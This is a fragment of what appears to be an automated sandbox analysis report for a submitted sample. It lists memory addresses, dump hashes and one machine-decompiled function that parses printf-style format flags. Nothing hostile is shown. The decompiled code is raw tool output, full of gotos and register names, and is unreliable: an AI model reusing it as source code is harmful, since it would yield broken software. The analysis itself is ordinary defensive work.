                                                                                                                                                                                                                                                        0x7ff6e5ac29ba
                                                                                                                                                                                                                                                        0x7ff6e5ac29bc
                                                                                                                                                                                                                                                        0x7ff6e5ac29cb
                                                                                                                                                                                                                                                        0x7ff6e5ac29cf
                                                                                                                                                                                                                                                        0x7ff6e5ac29d1
                                                                                                                                                                                                                                                        0x7ff6e5ac29da
                                                                                                                                                                                                                                                        0x7ff6e5ac29e0
                                                                                                                                                                                                                                                        0x7ff6e5ac29e2
                                                                                                                                                                                                                                                        0x7ff6e5ac29e5
                                                                                                                                                                                                                                                        0x7ff6e5ac29f3
                                                                                                                                                                                                                                                        0x7ff6e5ac29f9
                                                                                                                                                                                                                                                        0x7ff6e5ac29fb
                                                                                                                                                                                                                                                        0x7ff6e5ac2a00
                                                                                                                                                                                                                                                        0x7ff6e5ac2a02
                                                                                                                                                                                                                                                        0x7ff6e5ac2a06
                                                                                                                                                                                                                                                        0x7ff6e5ac2a15
                                                                                                                                                                                                                                                        0x7ff6e5ac2a1b
                                                                                                                                                                                                                                                        0x7ff6e5ac2a1d
                                                                                                                                                                                                                                                        0x7ff6e5ac2a20
                                                                                                                                                                                                                                                        0x7ff6e5ac2a22
                                                                                                                                                                                                                                                        0x7ff6e5ac2a26
                                                                                                                                                                                                                                                        0x7ff6e5ac2a2a
                                                                                                                                                                                                                                                        0x7ff6e5ac2a30
                                                                                                                                                                                                                                                        0x7ff6e5ac2a33
                                                                                                                                                                                                                                                        0x7ff6e5ac2a41
                                                                                                                                                                                                                                                        0x7ff6e5ac2a4b
                                                                                                                                                                                                                                                        0x7ff6e5ac2a4e
                                                                                                                                                                                                                                                        0x7ff6e5ac2a56
                                                                                                                                                                                                                                                        0x7ff6e5ac2a58
                                                                                                                                                                                                                                                        0x7ff6e5ac2a5e
                                                                                                                                                                                                                                                        0x7ff6e5ac2a64
                                                                                                                                                                                                                                                        0x7ff6e5ac2a64
                                                                                                                                                                                                                                                        0x7ff6e5ac2a68
                                                                                                                                                                                                                                                        0x7ff6e5ac2a6b
                                                                                                                                                                                                                                                        0x7ff6e5ac2a70
                                                                                                                                                                                                                                                        0x7ff6e5ac2a70
                                                                                                                                                                                                                                                        0x7ff6e5ac2a81
                                                                                                                                                                                                                                                        0x7ff6e5ac2a91
                                                                                                                                                                                                                                                        0x7ff6e5ac2a99
                                                                                                                                                                                                                                                        0x7ff6e5ac2a9b
                                                                                                                                                                                                                                                        0x7ff6e5ac2aa0
                                                                                                                                                                                                                                                        0x7ff6e5ac2aa4
                                                                                                                                                                                                                                                        0x7ff6e5ac2aaf
                                                                                                                                                                                                                                                        0x7ff6e5ac2ab5
                                                                                                                                                                                                                                                        0x7ff6e5ac2ab9
                                                                                                                                                                                                                                                        0x7ff6e5ac2abe
                                                                                                                                                                                                                                                        0x7ff6e5ac2ac0
                                                                                                                                                                                                                                                        0x7ff6e5ac2ac5
                                                                                                                                                                                                                                                        0x7ff6e5ac2ac7
                                                                                                                                                                                                                                                        0x7ff6e5ac2ad1
                                                                                                                                                                                                                                                        0x7ff6e5ac2ad7
                                                                                                                                                                                                                                                        0x7ff6e5ac2adf
                                                                                                                                                                                                                                                        0x7ff6e5ac2ae1
                                                                                                                                                                                                                                                        0x7ff6e5ac2ae7
                                                                                                                                                                                                                                                        0x7ff6e5ac2aed
                                                                                                                                                                                                                                                        0x7ff6e5ac2af3
                                                                                                                                                                                                                                                        0x7ff6e5ac2af9
                                                                                                                                                                                                                                                        0x7ff6e5ac2b04
                                                                                                                                                                                                                                                        0x7ff6e5ac2b0d
                                                                                                                                                                                                                                                        0x7ff6e5ac2b16
                                                                                                                                                                                                                                                        0x7ff6e5ac2b1c
                                                                                                                                                                                                                                                        0x7ff6e5ac2b28
                                                                                                                                                                                                                                                        0x7ff6e5ac2b2a
                                                                                                                                                                                                                                                        0x7ff6e5ac2b31
                                                                                                                                                                                                                                                        0x7ff6e5ac2b3e
                                                                                                                                                                                                                                                        0x7ff6e5ac2b46
                                                                                                                                                                                                                                                        0x7ff6e5ac2b4b
                                                                                                                                                                                                                                                        0x7ff6e5ac2b52
                                                                                                                                                                                                                                                        0x7ff6e5ac2b54
                                                                                                                                                                                                                                                        0x7ff6e5ac2b56
                                                                                                                                                                                                                                                        0x7ff6e5ac2b59
                                                                                                                                                                                                                                                        0x7ff6e5ac2b62
                                                                                                                                                                                                                                                        0x7ff6e5ac2b66
                                                                                                                                                                                                                                                        0x7ff6e5ac2b6d
                                                                                                                                                                                                                                                        0x7ff6e5ac2b72
                                                                                                                                                                                                                                                        0x7ff6e5ac2b77
                                                                                                                                                                                                                                                        0x7ff6e5ac2b7b
                                                                                                                                                                                                                                                        0x7ff6e5ac2b86
                                                                                                                                                                                                                                                        0x7ff6e5ac2b88
                                                                                                                                                                                                                                                        0x7ff6e5ac2b8d
                                                                                                                                                                                                                                                        0x7ff6e5ac2b8f
                                                                                                                                                                                                                                                        0x7ff6e5ac2b9a
                                                                                                                                                                                                                                                        0x7ff6e5ac2ba0
                                                                                                                                                                                                                                                        0x7ff6e5ac2ba4
                                                                                                                                                                                                                                                        0x7ff6e5ac2ba9
                                                                                                                                                                                                                                                        0x7ff6e5ac2bab
                                                                                                                                                                                                                                                        0x7ff6e5ac2bb0
                                                                                                                                                                                                                                                        0x7ff6e5ac2bb2
                                                                                                                                                                                                                                                        0x7ff6e5ac2bbc
                                                                                                                                                                                                                                                        0x7ff6e5ac2bc2
                                                                                                                                                                                                                                                        0x7ff6e5ac2bca
                                                                                                                                                                                                                                                        0x7ff6e5ac2bcc
                                                                                                                                                                                                                                                        0x7ff6e5ac2bd2
                                                                                                                                                                                                                                                        0x7ff6e5ac2c00

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                                                                                                                                                                                                                        • Instruction ID: 3d57868c7f514de0e1de464bcac6b77bbaebe7207d14ef6b0d8c4e954a7975c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59D1AF27B0864285EB68CE2D946037D27A2AF85F58F544235CE8DCF795CF2AEC45C34A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                                                                                                                                                                                                                        • Instruction ID: 315b9dedfd0f472b3f7085d999925647a335894a50276a3243e1487691967a4d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AC1A3732141E14BE2D9EB29E46947E7391F78930DB94403BEB8787B89CA3CE814D751
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC1E70(signed int __esi, long long __rbx, long long __rcx, long long __rdi, long long __rsi, signed int __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				long long _v24;
                                                                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                                                                                                        				signed int _t121;
                                                                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                                                                                        				void* _t172;
                                                                                                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                                                                                                        				signed char* _t183;
                                                                                                                                                                                                                                                        				signed char* _t188;
                                                                                                                                                                                                                                                        				long long _t190;
                                                                                                                                                                                                                                                        				signed char* _t193;
                                                                                                                                                                                                                                                        				intOrPtr* _t198;
                                                                                                                                                                                                                                                        				signed int* _t199;
                                                                                                                                                                                                                                                        				signed char** _t202;
                                                                                                                                                                                                                                                        				signed char** _t204;
                                                                                                                                                                                                                                                        				void* _t207;
                                                                                                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                                                                                                        				void* _t218;
                                                                                                                                                                                                                                                        				void* _t221;
                                                                                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t221 = __r8;
                                                                                                                                                                                                                                                        				_t216 = __rbp;
                                                                                                                                                                                                                                                        				_t214 = __rsi;
                                                                                                                                                                                                                                                        				_t172 = _t218;
                                                                                                                                                                                                                                                        				 *((long long*)(_t172 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t172 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t172 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t172 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_t173 =  *((intOrPtr*)(__rcx + 8));
                                                                                                                                                                                                                                                        				_t142 = __esi | 0xffffffff;
                                                                                                                                                                                                                                                        				_t190 = __rcx;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0xe5ac1eae;
                                                                                                                                                                                                                                                        				 *((char*)(_t173 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t173 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				goto 0xe5ac21d3;
                                                                                                                                                                                                                                                        				_t193 =  *((intOrPtr*)(__rcx + 0x10));
                                                                                                                                                                                                                                                        				if (_t193 != 0) goto 0xe5ac1ee5;
                                                                                                                                                                                                                                                        				 *((char*)(_t173 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t173 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                                                                                                                                                                                                        				_v24 = __rbp;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(__rcx + 8)), __rcx, _t193, _t207, __rsi, __rbp, __r8);
                                                                                                                                                                                                                                                        				goto 0xe5ac2179;
                                                                                                                                                                                                                                                        				_t112 =  *((intOrPtr*)(_t190 + 0x468)) + 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t190 + 0x468)) = _t112;
                                                                                                                                                                                                                                                        				if (_t112 == 2) goto 0xe5ac2176;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t190 + 0x48)) = 0;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x24) = bpl;
                                                                                                                                                                                                                                                        				r8b =  *_t193;
                                                                                                                                                                                                                                                        				goto 0xe5ac2152;
                                                                                                                                                                                                                                                        				if ( *(_t190 + 0x20) < 0) goto 0xe5ac2163;
                                                                                                                                                                                                                                                        				_t20 = _t221 - 0x20; // -32
                                                                                                                                                                                                                                                        				if (_t20 - 0x5a > 0) goto 0xe5ac1f38;
                                                                                                                                                                                                                                                        				goto 0xe5ac1f3b;
                                                                                                                                                                                                                                                        				_t116 =  *(0xe5ae1540 + (r8b - 0x20 +  &(_t193[1]) * 8) * 2) & 0x000000ff;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x24) = _t116;
                                                                                                                                                                                                                                                        				if (_t116 - 8 >= 0) goto 0xe5ac21c0;
                                                                                                                                                                                                                                                        				_t150 = _t116;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac207b;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac2064;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac2015;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac1fdc;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac1fd4;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac1fa6;
                                                                                                                                                                                                                                                        				if (_t150 == 0) goto 0xe5ac1f9c;
                                                                                                                                                                                                                                                        				if (_t116 - 0xfffffffffffffffc != 1) goto 0xe5ac21ec;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC2800(_t190, _t190, r8b - 0x20 +  &(_t193[1]) * 8, __rdi, _t214, _t221);
                                                                                                                                                                                                                                                        				goto 0xe5ac2008;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC24C8(_t190, _t223);
                                                                                                                                                                                                                                                        				goto 0xe5ac2008;
                                                                                                                                                                                                                                                        				if (r8b == 0x2a) goto 0xe5ac1fba;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1D50(_t190, _t190, _t190 + 0x30, _t214);
                                                                                                                                                                                                                                                        				goto 0xe5ac2008;
                                                                                                                                                                                                                                                        				_t198 =  *(_t190 + 0x18);
                                                                                                                                                                                                                                                        				 *(_t190 + 0x18) = _t198 + 8;
                                                                                                                                                                                                                                                        				_t120 =  *_t198;
                                                                                                                                                                                                                                                        				_t138 =  <  ? _t142 : _t120;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x30) =  <  ? _t142 : _t120;
                                                                                                                                                                                                                                                        				goto 0xe5ac2006;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x30) = 0;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				if (r8b == 0x2a) goto 0xe5ac1fe8;
                                                                                                                                                                                                                                                        				goto 0xe5ac1fb0;
                                                                                                                                                                                                                                                        				_t199 =  *(_t190 + 0x18);
                                                                                                                                                                                                                                                        				 *(_t190 + 0x18) =  &(_t199[2]);
                                                                                                                                                                                                                                                        				_t121 =  *_t199;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x2c) = _t121;
                                                                                                                                                                                                                                                        				if (_t121 >= 0) goto 0xe5ac2006;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000004;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x2c) =  ~_t121;
                                                                                                                                                                                                                                                        				if (1 == 0) goto 0xe5ac21ec;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				if (r8b == 0x20) goto 0xe5ac205b;
                                                                                                                                                                                                                                                        				if (r8b == 0x23) goto 0xe5ac2052;
                                                                                                                                                                                                                                                        				if (r8b == 0x2b) goto 0xe5ac2049;
                                                                                                                                                                                                                                                        				if (r8b == 0x2d) goto 0xe5ac2040;
                                                                                                                                                                                                                                                        				if (r8b != 0x30) goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000008;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000004;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000001;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000020;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000002;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x28) = _t216;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x38) = bpl;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x30) = _t142;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t190 + 0x34)) = 0;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x4c) = bpl;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				_t212 =  *((intOrPtr*)(_t190 + 8));
                                                                                                                                                                                                                                                        				 *(_t190 + 0x4c) = bpl;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t212 + 0x28)) != bpl) goto 0xe5ac2091;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20( &(_t199[2]), _t190, _t212, _t214);
                                                                                                                                                                                                                                                        				if (r8d - _t142 < 0) goto 0xe5ac2108;
                                                                                                                                                                                                                                                        				if (( *( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x18)))) +  *(_t190 + 0x39) * 2) & 0x00008000) == 0) goto 0xe5ac2108;
                                                                                                                                                                                                                                                        				_t202 =  *(_t190 + 0x460);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t202 + 0x10)) !=  *((intOrPtr*)(_t202 + 8))) goto 0xe5ac20cf;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t202 + 0x18)) == bpl) goto 0xe5ac20ca;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac20ed;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) = _t142;
                                                                                                                                                                                                                                                        				goto 0xe5ac20ed;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t202 + 0x10)) =  *((long long*)(_t202 + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *(_t190 + 0x460))) = r8b;
                                                                                                                                                                                                                                                        				 *( *(_t190 + 0x460)) =  &(( *( *(_t190 + 0x460)))[1]);
                                                                                                                                                                                                                                                        				_t183 =  *(_t190 + 0x10);
                                                                                                                                                                                                                                                        				r8b =  *_t183;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x10) =  &(_t183[1]);
                                                                                                                                                                                                                                                        				 *(_t190 + 0x39) = r8b;
                                                                                                                                                                                                                                                        				if (r8b == 0) goto 0xe5ac2194;
                                                                                                                                                                                                                                                        				_t204 =  *(_t190 + 0x460);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t204 + 0x10)) !=  *((intOrPtr*)(_t204 + 8))) goto 0xe5ac2129;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t204 + 0x18)) == bpl) goto 0xe5ac2124;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) = _t142;
                                                                                                                                                                                                                                                        				goto 0xe5ac2147;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t204 + 0x10)) =  *((long long*)(_t204 + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *(_t190 + 0x460))) = r8b;
                                                                                                                                                                                                                                                        				 *( *(_t190 + 0x460)) =  &(( *( *(_t190 + 0x460)))[1]);
                                                                                                                                                                                                                                                        				_t188 =  *(_t190 + 0x10);
                                                                                                                                                                                                                                                        				r8b =  *_t188;
                                                                                                                                                                                                                                                        				 *(_t190 + 0x10) =  &(_t188[1]);
                                                                                                                                                                                                                                                        				 *(_t190 + 0x39) = r8b;
                                                                                                                                                                                                                                                        				if (r8b != 0) goto 0xe5ac1f15;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t190 + 0x468)) =  *((intOrPtr*)(_t190 + 0x468)) + 1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t190 + 0x468)) != 2) goto 0xe5ac1f03;
                                                                                                                                                                                                                                                        				return  *(_t190 + 0x20);
                                                                                                                                                                                                                                                        			}



























                                                                                                                                                                                                                                                        0x7ff6e5ac1e70
                                                                                                                                                                                                                                                        0x7ff6e5ac1e70
                                                                                                                                                                                                                                                        0x7ff6e5ac1e70
                                                                                                                                                                                                                                                        0x7ff6e5ac1e70
                                                                                                                                                                                                                                                        0x7ff6e5ac1e73
                                                                                                                                                                                                                                                        0x7ff6e5ac1e77
                                                                                                                                                                                                                                                        0x7ff6e5ac1e7b
                                                                                                                                                                                                                                                        0x7ff6e5ac1e7f
                                                                                                                                                                                                                                                        0x7ff6e5ac1e89
                                                                                                                                                                                                                                                        0x7ff6e5ac1e8d
                                                                                                                                                                                                                                                        0x7ff6e5ac1e92
                                                                                                                                                                                                                                                        0x7ff6e5ac1e9c
                                                                                                                                                                                                                                                        0x7ff6e5ac1e9e
                                                                                                                                                                                                                                                        0x7ff6e5ac1ea2
                                                                                                                                                                                                                                                        0x7ff6e5ac1ea9
                                                                                                                                                                                                                                                        0x7ff6e5ac1eae
                                                                                                                                                                                                                                                        0x7ff6e5ac1eb5
                                                                                                                                                                                                                                                        0x7ff6e5ac1eb7
                                                                                                                                                                                                                                                        0x7ff6e5ac1ebb
                                                                                                                                                                                                                                                        0x7ff6e5ac1ebe
                                                                                                                                                                                                                                                        0x7ff6e5ac1ec5
                                                                                                                                                                                                                                                        0x7ff6e5ac1ece
                                                                                                                                                                                                                                                        0x7ff6e5ac1ed3
                                                                                                                                                                                                                                                        0x7ff6e5ac1ed8
                                                                                                                                                                                                                                                        0x7ff6e5ac1ee0
                                                                                                                                                                                                                                                        0x7ff6e5ac1eeb
                                                                                                                                                                                                                                                        0x7ff6e5ac1eed
                                                                                                                                                                                                                                                        0x7ff6e5ac1ef6
                                                                                                                                                                                                                                                        0x7ff6e5ac1f03
                                                                                                                                                                                                                                                        0x7ff6e5ac1f06
                                                                                                                                                                                                                                                        0x7ff6e5ac1f0a
                                                                                                                                                                                                                                                        0x7ff6e5ac1f10
                                                                                                                                                                                                                                                        0x7ff6e5ac1f18
                                                                                                                                                                                                                                                        0x7ff6e5ac1f1e
                                                                                                                                                                                                                                                        0x7ff6e5ac1f24
                                                                                                                                                                                                                                                        0x7ff6e5ac1f36
                                                                                                                                                                                                                                                        0x7ff6e5ac1f49
                                                                                                                                                                                                                                                        0x7ff6e5ac1f4e
                                                                                                                                                                                                                                                        0x7ff6e5ac1f53
                                                                                                                                                                                                                                                        0x7ff6e5ac1f5b
                                                                                                                                                                                                                                                        0x7ff6e5ac1f5d
                                                                                                                                                                                                                                                        0x7ff6e5ac1f66
                                                                                                                                                                                                                                                        0x7ff6e5ac1f6f
                                                                                                                                                                                                                                                        0x7ff6e5ac1f78
                                                                                                                                                                                                                                                        0x7ff6e5ac1f7d
                                                                                                                                                                                                                                                        0x7ff6e5ac1f82
                                                                                                                                                                                                                                                        0x7ff6e5ac1f87
                                                                                                                                                                                                                                                        0x7ff6e5ac1f8c
                                                                                                                                                                                                                                                        0x7ff6e5ac1f95
                                                                                                                                                                                                                                                        0x7ff6e5ac1f9a
                                                                                                                                                                                                                                                        0x7ff6e5ac1f9f
                                                                                                                                                                                                                                                        0x7ff6e5ac1fa4
                                                                                                                                                                                                                                                        0x7ff6e5ac1faa
                                                                                                                                                                                                                                                        0x7ff6e5ac1fb3
                                                                                                                                                                                                                                                        0x7ff6e5ac1fb8
                                                                                                                                                                                                                                                        0x7ff6e5ac1fba
                                                                                                                                                                                                                                                        0x7ff6e5ac1fc2
                                                                                                                                                                                                                                                        0x7ff6e5ac1fc6
                                                                                                                                                                                                                                                        0x7ff6e5ac1fcc
                                                                                                                                                                                                                                                        0x7ff6e5ac1fcf
                                                                                                                                                                                                                                                        0x7ff6e5ac1fd2
                                                                                                                                                                                                                                                        0x7ff6e5ac1fd4
                                                                                                                                                                                                                                                        0x7ff6e5ac1fd7
                                                                                                                                                                                                                                                        0x7ff6e5ac1fe0
                                                                                                                                                                                                                                                        0x7ff6e5ac1fe6
                                                                                                                                                                                                                                                        0x7ff6e5ac1fe8
                                                                                                                                                                                                                                                        0x7ff6e5ac1ff0
                                                                                                                                                                                                                                                        0x7ff6e5ac1ff4
                                                                                                                                                                                                                                                        0x7ff6e5ac1ff6
                                                                                                                                                                                                                                                        0x7ff6e5ac1ffb
                                                                                                                                                                                                                                                        0x7ff6e5ac1ffd
                                                                                                                                                                                                                                                        0x7ff6e5ac2003
                                                                                                                                                                                                                                                        0x7ff6e5ac200a
                                                                                                                                                                                                                                                        0x7ff6e5ac2010
                                                                                                                                                                                                                                                        0x7ff6e5ac2019
                                                                                                                                                                                                                                                        0x7ff6e5ac201f
                                                                                                                                                                                                                                                        0x7ff6e5ac2025
                                                                                                                                                                                                                                                        0x7ff6e5ac202b
                                                                                                                                                                                                                                                        0x7ff6e5ac2031
                                                                                                                                                                                                                                                        0x7ff6e5ac2037
                                                                                                                                                                                                                                                        0x7ff6e5ac203b
                                                                                                                                                                                                                                                        0x7ff6e5ac2040
                                                                                                                                                                                                                                                        0x7ff6e5ac2044
                                                                                                                                                                                                                                                        0x7ff6e5ac2049
                                                                                                                                                                                                                                                        0x7ff6e5ac204d
                                                                                                                                                                                                                                                        0x7ff6e5ac2052
                                                                                                                                                                                                                                                        0x7ff6e5ac2056
                                                                                                                                                                                                                                                        0x7ff6e5ac205b
                                                                                                                                                                                                                                                        0x7ff6e5ac205f
                                                                                                                                                                                                                                                        0x7ff6e5ac2064
                                                                                                                                                                                                                                                        0x7ff6e5ac2068
                                                                                                                                                                                                                                                        0x7ff6e5ac206c
                                                                                                                                                                                                                                                        0x7ff6e5ac206f
                                                                                                                                                                                                                                                        0x7ff6e5ac2072
                                                                                                                                                                                                                                                        0x7ff6e5ac2076
                                                                                                                                                                                                                                                        0x7ff6e5ac207b
                                                                                                                                                                                                                                                        0x7ff6e5ac207f
                                                                                                                                                                                                                                                        0x7ff6e5ac2087
                                                                                                                                                                                                                                                        0x7ff6e5ac208c
                                                                                                                                                                                                                                                        0x7ff6e5ac2099
                                                                                                                                                                                                                                                        0x7ff6e5ac20ac
                                                                                                                                                                                                                                                        0x7ff6e5ac20ae
                                                                                                                                                                                                                                                        0x7ff6e5ac20bd
                                                                                                                                                                                                                                                        0x7ff6e5ac20c3
                                                                                                                                                                                                                                                        0x7ff6e5ac20c5
                                                                                                                                                                                                                                                        0x7ff6e5ac20c8
                                                                                                                                                                                                                                                        0x7ff6e5ac20ca
                                                                                                                                                                                                                                                        0x7ff6e5ac20cd
                                                                                                                                                                                                                                                        0x7ff6e5ac20cf
                                                                                                                                                                                                                                                        0x7ff6e5ac20d2
                                                                                                                                                                                                                                                        0x7ff6e5ac20e0
